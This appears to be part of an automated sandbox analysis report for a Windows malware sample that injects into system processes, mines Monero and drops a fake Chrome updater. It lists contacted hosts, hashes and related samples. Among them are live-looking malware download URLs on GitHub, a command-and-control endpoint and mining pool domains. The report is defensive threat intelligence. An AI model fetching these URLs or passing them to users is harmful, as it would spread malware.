                      https://github.com/231d23EDD3dwedf234fdew223df23wqf/wef4t43gf34f4g4gfefwg4gfwfgehet5hsrtjrjefswf/raw0%Avira URL Cloudsafe
                      https://github.com/231d23EDD3dwedf234fdew223df23wqf/wef4t43gf34f4g4gfefwg4gfwfgehet5hsrtjrjefswf/blo0%Avira URL Cloudsafe
                      http://Passport.NET/tb0%Avira URL Cloudsafe
                      http://docs.oasis-open.org/ws-sx/ws-trust/2005120%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      github.com
                      		140.82.121.3
                      		truefalse
                        		unknown
                        raw.githubusercontent.com
                        		185.199.109.133
                        		truefalse
                          		unknown
                          monerooceans.stream
                          		149.102.143.109
                          		truetrue
                            		unknown
                            wea9ufgh438790atrhjwiujngzhe4wa709rthjcwa9nv8n980avw.roast247.eu.org
                            		172.67.206.184
                            		truefalse
                              		unknown
                              gulf.moneroocean.stream
                              		unknown
                              		unknowntrue
                                		unknown

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                https://wea9ufgh438790atrhjwiujngzhe4wa709rthjcwa9nv8n980avw.roast247.eu.org/api/endpoint.phpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://github.com/231d23EDD3dwedf234fdew223df23wqf/wef4t43gf34f4g4gfefwg4gfwfgehet5hsrtjrjefswf/blob/main/system64x.exe?raw=truefalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://github.com/231d23EDD3dwedf234fdew223df23wqf/wef4t43gf34f4g4gfefwg4gfwfgehet5hsrtjrjefswf/raw/main/system64x.exefalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://raw.githubusercontent.com/231d23EDD3dwedf234fdew223df23wqf/wef4t43gf34f4g4gfefwg4gfwfgehet5hsrtjrjefswf/main/system64x.exefalse
                                • Avira URL Cloud: safe
                                		unknown

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                http://nuget.org/NuGet.exeSecuriteInfo.com.Win32.Malware-gen.17013.17645.exe, 00000001.00000002.2412690299.000000001272F000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702lsass.exe, 0000001F.00000000.2414807552.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000002.3596981552.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://pesterbdd.com/images/Pester.pngSecuriteInfo.com.Win32.Malware-gen.17013.17645.exe, 00000001.00000002.2401131352.00000000028E4000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://schemas.xmlsoap.org/ws/2004/09/policylsass.exe, 0000001F.00000000.2414807552.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000002.3596981552.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://schemas.xmlsoap.org/wsdl/ertieslsass.exe, 0000001F.00000000.2414807552.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000002.3596981552.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://schemas.xmlsoap.org/soap/encoding/SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe, 00000001.00000002.2401131352.00000000028E4000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.apache.org/licenses/LICENSE-2.0.htmlSecuriteInfo.com.Win32.Malware-gen.17013.17645.exe, 00000001.00000002.2401131352.00000000028E4000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://github.comSecuriteInfo.com.Win32.Malware-gen.17013.17645.exe, 00000001.00000002.2401131352.0000000003353000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe, 00000001.00000002.2401131352.0000000003467000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://172.94.1qdialer.exe, 0000002F.00000002.3586212031.0000000140001000.00000040.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://contoso.com/LicenseSecuriteInfo.com.Win32.Malware-gen.17013.17645.exe, 00000001.00000002.2412690299.000000001272F000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://contoso.com/IconSecuriteInfo.com.Win32.Malware-gen.17013.17645.exe, 00000001.00000002.2412690299.000000001272F000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://schemas.xmlsoap.org/ws/2005/02/trustlsass.exe, 0000001F.00000000.2414807552.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000002.3596981552.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://github.com/Pester/PesterSecuriteInfo.com.Win32.Malware-gen.17013.17645.exe, 00000001.00000002.2401131352.00000000028E4000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.microsoft.coASecuriteInfo.com.Win32.Malware-gen.17013.17645.exe, 00000001.00000002.2432150701.000000001C83A000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://wea9ufgh438790atrhjwiujngzhe4wa709rthjcwa9nv8n980avw.roast247.eu.org/api/endpoint.php--cinitdialer.exe, 0000002F.00000002.3603906840.0000025545E25000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://github.comSecuriteInfo.com.Win32.Malware-gen.17013.17645.exe, 00000001.00000002.2401131352.000000000346B000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://github.com(SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe, 00000001.00000002.2401131352.000000000348F000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://schemas.xmlsoap.org/ws/2005/07/securitypolicylsass.exe, 0000001F.00000000.2414877589.00000140AD850000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000000.2414807552.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000002.3597393060.00000140AD850000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000002.3596981552.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://raw.githubusercontent.com/231d23EDD3dwedf234fdew223df23wqf/wef4t43gf34f4g4gfefwg4gfwfgehet5hSecuriteInfo.com.Win32.Malware-gen.17013.17645.exe, 00000001.00000002.2401131352.00000000034EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://schemas.xmlsoap.org/wsdl/soap12/lsass.exe, 0000001F.00000002.3596981552.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://raw.githubusercontent.comSecuriteInfo.com.Win32.Malware-gen.17013.17645.exe, 00000001.00000002.2401131352.00000000034EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://3csp.icrosof4m/ocp0lsass.exe, 0000001F.00000000.2415950119.00000140AE074000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000002.3604819718.00000140AE074000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://schemas.xmlsoap.org/wsdl/lsass.exe, 0000001F.00000002.3596981552.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://contoso.com/SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe, 00000001.00000002.2412690299.000000001272F000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://nuget.org/nuget.exeSecuriteInfo.com.Win32.Malware-gen.17013.17645.exe, 00000001.00000002.2412690299.000000001272F000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://raw.githubusercontent.comSecuriteInfo.com.Win32.Malware-gen.17013.17645.exe, 00000001.00000002.2401131352.00000000034EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://xmrig.com/docs/algorithmsdialer.exe, 0000002F.00000002.3586212031.0000000140001000.00000040.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://github.com/231d23EDD3dwedf234fdew223df23wqf/wef4t43gf34f4g4gfefwg4gfwfgehet5hsrtjrjefswf/rawSecuriteInfo.com.Win32.Malware-gen.17013.17645.exe, 00000001.00000002.2401131352.000000000348F000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://Passport.NET/tbsvchost.exe, 00000037.00000000.2501565455.00000205FD288000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://docs.oasis-open.org/ws-sx/ws-trust/200512lsass.exe, 0000001F.00000000.2414877589.00000140AD850000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000002.3597393060.00000140AD850000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdlsass.exe, 0000001F.00000000.2414807552.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000002.3596981552.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://github.com/231d23EDD3dwedf234fdew223df23wqf/wef4t43gf34f4g4gfefwg4gfwfgehet5hsrtjrjefswf/bloSecuriteInfo.com.Win32.Malware-gen.17013.17645.exe, 00000001.00000002.2401131352.00000000028E4000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameSecuriteInfo.com.Win32.Malware-gen.17013.17645.exe, 00000001.00000002.2401131352.00000000026B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown

                                World Map of Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public IPs

                                IPDomainCountryFlagASNASN NameMalicious
                                185.199.109.133
                                		raw.githubusercontent.comNetherlands
                                		54113FASTLYUSfalse
                                172.67.206.184
                                		wea9ufgh438790atrhjwiujngzhe4wa709rthjcwa9nv8n980avw.roast247.eu.orgUnited States
                                		13335CLOUDFLARENETUSfalse
                                140.82.121.3
                                		github.comUnited States
                                		36459GITHUBUSfalse
                                149.102.143.109
                                		monerooceans.streamUnited States
                                		174COGENT-174UStrue

                                General Information

                                Joe Sandbox version:40.0.0 Tourmaline
                                Analysis ID:1473042
                                Start date and time:2024-07-14 23:40:10 +02:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 12m 15s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:45
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:15
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe
                                Detection:MAL
                                Classification:mal100.adwa.spyw.evad.mine.winEXE@65/86@4/4
                                EGA Information:
                                • Successful, ratio: 95.5%
                                HCA Information:Failed
                                Cookbook Comments:
                                • Found application associated with file extension: .exe

                                Warnings

                                • Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe, WmiPrvSE.exe
                                • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                • Execution Graph export aborted for target SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe, PID 612 because it is empty
                                • Not all processes where analyzed, report is missing behavior information
                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                • Report size exceeded maximum capacity and may have missing behavior information.
                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                • Report size getting too big, too many NtCreateKey calls found.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                • VT rate limit hit for: SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe

                                Simulations

                                Behavior and APIs

                                TimeTypeDescription
                                17:41:25API Interceptor42x Sleep call for process: SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe modified
                                17:41:36API Interceptor1x Sleep call for process: system64x.exe modified
                                17:41:37API Interceptor34x Sleep call for process: powershell.exe modified
                                17:42:12API Interceptor343550x Sleep call for process: winlogon.exe modified
                                17:42:13API Interceptor273461x Sleep call for process: lsass.exe modified
                                17:42:15API Interceptor326636x Sleep call for process: dwm.exe modified
                                17:42:15API Interceptor2521x Sleep call for process: svchost.exe modified
                                17:42:20API Interceptor1731x Sleep call for process: dialer.exe modified
                                17:42:25API Interceptor221x Sleep call for process: WMIADAP.exe modified

                                Joe Sandbox View / Context

                                IPs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                185.199.109.133Dead By Daylight.exeGet hashmaliciousNovaSentinelBrowse
                                  https://www.kudoboard.com/boards/9yja32B2/Get hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                    http://gpfkk.ktt55.my.id/Get hashmaliciousHTMLPhisherBrowse
                                      https://www.etched.com/announcing-etchedGet hashmaliciousUnknownBrowse
                                        https://dharaprajapati2.github.io/Netflix-cloneGet hashmaliciousUnknownBrowse
                                          https://iamarunraghav.github.io/Project--Netflix-cloneGet hashmaliciousUnknownBrowse
                                            https://www.canva.com/design/DAGKjIaIIOg/dnxUW38JksDdsGh-XKZQbw/edit?utm_content=DAGKjIaIIOg&utm_campaign=designshare&utm_medium=link2&utm_source=sharebuttonGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                              https://github.com/blackcoffe74/blackcoffe74/releases/tag/latGet hashmaliciousLummaC, BiFrost, LummaC StealerBrowse
                                                https://prehelp.vercel.app/Get hashmaliciousUnknownBrowse
                                                  https://lnkd.in/edATmmaaGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                                    140.82.121.36glRBXzk6i.exeGet hashmaliciousRedLineBrowse
                                                    • github.com/dyrka314/Balumba/releases/download/ver2/encrypted_ImpulseCrypt_5527713376.2.exe
                                                    firefox.lnkGet hashmaliciousCobaltStrikeBrowse
                                                    • github.com/john-xor/temp/blob/main/index.html?raw=true
                                                    0XzeMRyE1e.exeGet hashmaliciousAmadey, VidarBrowse
                                                    • github.com/neiqops/ajajaj/raw/main/file_22613.exe
                                                    MzRn1YNrbz.exeGet hashmaliciousVidarBrowse
                                                    • github.com/AdobeInstal/Adobe-After-Effects-CC-2022-1.4/releases/download/123/Software.exe
                                                    RfORrHIRNe.docGet hashmaliciousUnknownBrowse
                                                    • github.com/ssbb36/stv/raw/main/5.mp3

                                                    Domains

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    raw.githubusercontent.comDead By Daylight.exeGet hashmaliciousNovaSentinelBrowse
                                                    • 185.199.109.133
                                                    Dead By Daylight.exeGet hashmaliciousNovaSentinelBrowse
                                                    • 185.199.110.133
                                                    SecuriteInfo.com.Win32.MalwareX-gen.3895.3560.exeGet hashmaliciousUnknownBrowse
                                                    • 185.199.108.133
                                                    SecuriteInfo.com.Win32.MalwareX-gen.3895.3560.exeGet hashmaliciousUnknownBrowse
                                                    • 185.199.108.133
                                                    SecuriteInfo.com.Win64.Evo-gen.30371.21664.exeGet hashmaliciousAkira StealerBrowse
                                                    • 185.199.111.133
                                                    http://x3ifs.ktt55.my.id/Get hashmaliciousHTMLPhisherBrowse
                                                    • 185.199.108.133
                                                    SecuriteInfo.com.Win64.Evo-gen.30371.21664.exeGet hashmaliciousUnknownBrowse
                                                    • 185.199.111.133
                                                    http://gpfkk.ktt55.my.id/Get hashmaliciousHTMLPhisherBrowse
                                                    • 185.199.109.133
                                                    UniGetUI.Installer.exeGet hashmaliciousUnknownBrowse
                                                    • 185.199.111.133
                                                    UniGetUI.Installer.exeGet hashmaliciousUnknownBrowse
                                                    • 185.199.108.133
                                                    github.comDead By Daylight.exeGet hashmaliciousNovaSentinelBrowse
                                                    • 140.82.121.3
                                                    Dead By Daylight.exeGet hashmaliciousNovaSentinelBrowse
                                                    • 140.82.121.3
                                                    cHNKEpg5PJ.jarGet hashmaliciousSTRRATBrowse
                                                    • 140.82.121.3
                                                    https://help--wlletconnect.gitbook.io/usGet hashmaliciousUnknownBrowse
                                                    • 140.82.121.4
                                                    https://www.kudoboard.com/boards/9yja32B2/Get hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                                    • 140.82.121.4
                                                    https://www.sciencebuddies.org/Handlers/QrCode.aspx?u=h%74%74%70%73%3a%2f%2f%77%65%61%70%6f%6e%78%62%61%6e%64%2e%63%6f%6d%2f%6d%703%2f&c=E,1,2ueN4Mj2php13GPksjFRG_hUZYHLWObd4Ucer7VGzLDz8Kun3RC-6YKOBSRIV6Kok50F_i4RonPCGZc0QPIvb37YvFC6np1XNEfPhtAX&typo=1Get hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                                    • 140.82.121.4
                                                    https://linktr.ee/54544hgtsrsdsgsGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                                    • 140.82.121.4
                                                    ShareX-16.1.0-setup.exeGet hashmaliciousUnknownBrowse
                                                    • 140.82.121.5
                                                    https://zzmc.tatateri.com/lPY0TK6A/#Mandrew.lapkin@innocap.comGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                                    • 140.82.121.4
                                                    monerooceans.streamMDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zipGet hashmaliciousXmrigBrowse
                                                    • 44.196.193.227
                                                    17ae2fbf36a41622374adfd3b1608e08.10.drGet hashmaliciousUnknownBrowse
                                                    • 44.224.209.130
                                                    SecuriteInfo.com.Win64.Evo-gen.32403.24162.exeGet hashmaliciousXmrigBrowse
                                                    • 44.196.193.227
                                                    GoogleCrashHandler.exeGet hashmaliciousXmrigBrowse
                                                    • 44.196.193.227
                                                    yljlbesdmoas.exeGet hashmaliciousXmrigBrowse
                                                    • 44.196.193.227
                                                    GoogleCrashHandler.exeGet hashmaliciousXmrigBrowse
                                                    • 44.196.193.227
                                                    GoogleCrashHandler.exeGet hashmaliciousXmrigBrowse
                                                    • 44.224.209.130
                                                    vHAgn4Dx00.exeGet hashmaliciousAveMaria, UACMe, XmrigBrowse
                                                    • 44.224.209.130
                                                    vABMEuk0Ie.exeGet hashmaliciousXmrigBrowse
                                                    • 44.196.193.227
                                                    SecuriteInfo.com.W64.Rozena.HA.gen.Eldorado.22978.31544.exeGet hashmaliciousXmrigBrowse
                                                    • 44.196.193.227

                                                    ASNs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    FASTLYUSDead By Daylight.exeGet hashmaliciousNovaSentinelBrowse
                                                    • 185.199.109.133
                                                    Dead By Daylight.exeGet hashmaliciousNovaSentinelBrowse
                                                    • 185.199.110.133
                                                    https://itaconsorciodigital.com.br/termosdeusoGet hashmaliciousUnknownBrowse
                                                    • 151.101.1.229
                                                    https://useadobe.shop/Get hashmaliciousUnknownBrowse
                                                    • 151.101.194.137
                                                    https://bt-broadband-56137b-5027a8eef78863ed48b.webflow.io/Get hashmaliciousUnknownBrowse
                                                    • 151.101.1.229
                                                    https://lnky.ru/qqj9vGet hashmaliciousUnknownBrowse
                                                    • 151.101.1.229
                                                    https://pub-d6d61a1c2aed4d8bbc46e0a32bfde07a.r2.dev/index.htmlGet hashmaliciousUnknownBrowse
                                                    • 185.199.108.153
                                                    http://abhay-panchal-14.github.io/netflixGet hashmaliciousUnknownBrowse
                                                    • 185.199.108.153
                                                    http://bcjaconski.wixsite.com/my-siteGet hashmaliciousUnknownBrowse
                                                    • 151.101.66.217
                                                    http://pub-dde186d3ef204edd89e847d256cdf5bd.r2.dev/ghupl.htmlGet hashmaliciousUnknownBrowse
                                                    • 151.101.194.137
                                                    CLOUDFLARENETUSNAtK3GR95V.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                    • 188.114.97.3
                                                    Loader.exeGet hashmaliciousLummaC, XmrigBrowse
                                                    • 104.20.3.235
                                                    setup.exeGet hashmaliciousUnknownBrowse
                                                    • 104.21.79.229
                                                    setup.exeGet hashmaliciousUnknownBrowse
                                                    • 104.21.79.229
                                                    #U8acb#U6c42#U66f8.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                    • 188.114.96.3
                                                    https://jc541gdi.r.ap-south-1.awstrack.me/L0/https:%2F%2Fapi.growthschool.io%2Fredirect%3Fredirect=https%253A%252F%252Foutskill-api.growthschool.io%252Fv1%252Fredirect%253Fredirect%253Dhttps%25253A%25252F%25252Fwebinar.growthschool.io%25252Flive%25252F269690%25253Fsignup%25253Dd4694f1d-e1f6-4ebc-81f9-ccf7f397c75f%2526propsGeneratorKey%253DwebinarCommsLinkClicked%2526job%253DtrackEvent%2526eventName%253DWebinar%252520Comms%252520Link%252520Clicked%2526trackingProps%25255Btemplate_id%25255D%253DoneHourBefore%2526trackingProps%25255Bcomms_channel%25255D%253Demail%2526trackingProps%25255Bcta_text%25255D%253DJoin%252520Stream%2526trackingProps%25255Bcta_type%25255D%253Dlive_session%2526trackingProps%25255Blink_clicked%25255D%253Dhttps%25253A%25252F%25252Fwebinar.growthschool.io%25252Flive%25252F269690%25253Fsignup%25253Dd4694f1d-e1f6-4ebc-81f9-ccf7f397c75f%2526webinarSignupId%253D2330725/1/01090190b18b243d-902569cd-4b19-4fb0-9d62-751dd82840dc-000000/eiZ4tO0LwZqkUm_KmdP3dz-yVLc=163Get hashmaliciousUnknownBrowse
                                                    • 104.22.65.157
                                                    s6ue6dcFAI.exeGet hashmaliciousBabadedaBrowse
                                                    • 172.64.41.3
                                                    JblYqEneyY.exeGet hashmaliciousBabadedaBrowse
                                                    • 172.64.41.3
                                                    DHL Waybill & Shipping Document.exeGet hashmaliciousSnake KeyloggerBrowse
                                                    • 188.114.96.3
                                                    s6ue6dcFAI.exeGet hashmaliciousBabadedaBrowse
                                                    • 172.64.41.3
                                                    COGENT-174USbotx.mpsl.elfGet hashmaliciousMiraiBrowse
                                                    • 154.54.88.68
                                                    DHL_AWB#6078538091.exeGet hashmaliciousFormBookBrowse
                                                    • 154.62.105.138
                                                    185.208.158.215-x86-2024-07-14T08_54_06.elfGet hashmaliciousUnknownBrowse
                                                    • 38.177.156.242
                                                    185.208.158.215-mips-2024-07-14T08_54_05.elfGet hashmaliciousUnknownBrowse
                                                    • 149.44.241.36
                                                    BL.exeGet hashmaliciousFormBookBrowse
                                                    • 154.41.249.52
                                                    OrderPI.exeGet hashmaliciousFormBookBrowse
                                                    • 38.47.232.178
                                                    http://sherwoodhomeshow.comGet hashmaliciousUnknownBrowse
                                                    • 38.180.60.246
                                                    jew.arm6.elfGet hashmaliciousMiraiBrowse
                                                    • 38.112.234.61
                                                    jew.arm7.elfGet hashmaliciousMiraiBrowse
                                                    • 38.64.166.29
                                                    jew.mpsl.elfGet hashmaliciousMiraiBrowse
                                                    • 149.95.138.157
                                                    GITHUBUSDead By Daylight.exeGet hashmaliciousNovaSentinelBrowse
                                                    • 140.82.121.3
                                                    Dead By Daylight.exeGet hashmaliciousNovaSentinelBrowse
                                                    • 140.82.121.3
                                                    cHNKEpg5PJ.jarGet hashmaliciousSTRRATBrowse
                                                    • 140.82.121.4
                                                    https://help--wlletconnect.gitbook.io/Get hashmaliciousUnknownBrowse
                                                    • 140.82.121.5
                                                    https://help--wlletconnect.gitbook.io/usGet hashmaliciousUnknownBrowse
                                                    • 140.82.121.4
                                                    https://www.kudoboard.com/boards/9yja32B2/Get hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                                    • 140.82.121.4
                                                    https://www.sciencebuddies.org/Handlers/QrCode.aspx?u=h%74%74%70%73%3a%2f%2f%77%65%61%70%6f%6e%78%62%61%6e%64%2e%63%6f%6d%2f%6d%703%2f&c=E,1,2ueN4Mj2php13GPksjFRG_hUZYHLWObd4Ucer7VGzLDz8Kun3RC-6YKOBSRIV6Kok50F_i4RonPCGZc0QPIvb37YvFC6np1XNEfPhtAX&typo=1Get hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                                    • 140.82.121.4
                                                    https://linktr.ee/54544hgtsrsdsgsGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                                    • 140.82.121.4
                                                    ShareX-16.1.0-setup.exeGet hashmaliciousUnknownBrowse
                                                    • 140.82.121.5
                                                    https://zzmc.tatateri.com/lPY0TK6A/#Mandrew.lapkin@innocap.comGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                                    • 140.82.121.4

                                                    JA3 Fingerprints

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    3b5074b1b5d032e5620f69f9f700ff0eAvowed Beta.exeGet hashmaliciousXWormBrowse
                                                    • 185.199.109.133
                                                    • 140.82.121.3
                                                    Drive.exeGet hashmaliciousXWormBrowse
                                                    • 185.199.109.133
                                                    • 140.82.121.3
                                                    WaveInstaller.exeGet hashmaliciousXWormBrowse
                                                    • 185.199.109.133
                                                    • 140.82.121.3
                                                    yvTs7wivyF.exeGet hashmaliciousRedLineBrowse
                                                    • 185.199.109.133
                                                    • 140.82.121.3
                                                    PC driver.exeGet hashmaliciousXWormBrowse
                                                    • 185.199.109.133
                                                    • 140.82.121.3
                                                    EnuV7qEX01.exeGet hashmaliciousRedLineBrowse
                                                    • 185.199.109.133
                                                    • 140.82.121.3
                                                    217.exeGet hashmaliciousRedLineBrowse
                                                    • 185.199.109.133
                                                    • 140.82.121.3
                                                    Shipping Docs PO#QSB-8927393_2324, QSB-8927394_23-24.xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                    • 185.199.109.133
                                                    • 140.82.121.3
                                                    Orden de Compra.exeGet hashmaliciousGuLoaderBrowse
                                                    • 185.199.109.133
                                                    • 140.82.121.3
                                                    https://itaconsorciodigital.com.br/termosdeusoGet hashmaliciousUnknownBrowse
                                                    • 185.199.109.133
                                                    • 140.82.121.3

                                                    Dropped Files

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    C:\Windows\Temp\voeeoiqrjnla.sysLoader.exeGet hashmaliciousLummaC, XmrigBrowse
                                                      updater.exeGet hashmaliciousXmrigBrowse
                                                        Setup.exeGet hashmaliciousXmrigBrowse
                                                          Laun3cher_E@zy.exeGet hashmaliciousLummaC, Apollo, LummaC Stealer, XmrigBrowse
                                                            daRNfwifay.exeGet hashmaliciousXmrigBrowse
                                                              cherax.exeGet hashmaliciousBlank GrabberBrowse
                                                                K4gsPJGEi4.exeGet hashmaliciousXmrigBrowse
                                                                  32Vec0G7f5.exeGet hashmaliciousPureLog Stealer, Xmrig, zgRATBrowse
                                                                    BZMxi2zof1.exeGet hashmaliciousRedLine, XmrigBrowse
                                                                      file.exeGet hashmaliciousXmrigBrowse

                                                                        Created / dropped Files

                                                                        C:\ProgramData\Google\Chrome\updater.exe

                                                                        Download File
                                                                        Process:C:\Windows\SysWOW64\system64x.exe
                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):2870272
                                                                        Entropy (8bit):6.525182750076353
                                                                        Encrypted:false
                                                                        SSDEEP:49152:fcFa11QV8HUsmZ00Mtju4/+Kej4Oehz0EA7GHk2D/CiVr8KmPfj7G4Lxec+DA:UA1ItsmZ00MBu4Ies7Gj/CAYKsrdFecD
                                                                        MD5:4471F946569BFA17D68108068D7A17A1
                                                                        SHA1:E16A100F0B1052120B13FFE59EF0E6A8DCFB0160
                                                                        SHA-256:CAD52FAF41B806A22F502E1937ED72637D013C3C964404D448FA7A5C0E48E56C
                                                                        SHA-512:F2ADC61D04F6B6792AD37E2230D7CCEBB6090B45423E95BB21D5BCEE09304A3203F15A9CEAE39E6E1537F035E79F1DDA3B8FC93D03F6984C6260044ED046BC17
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: Avira, Detection: 100%
                                                                        • Antivirus: ReversingLabs, Detection: 92%
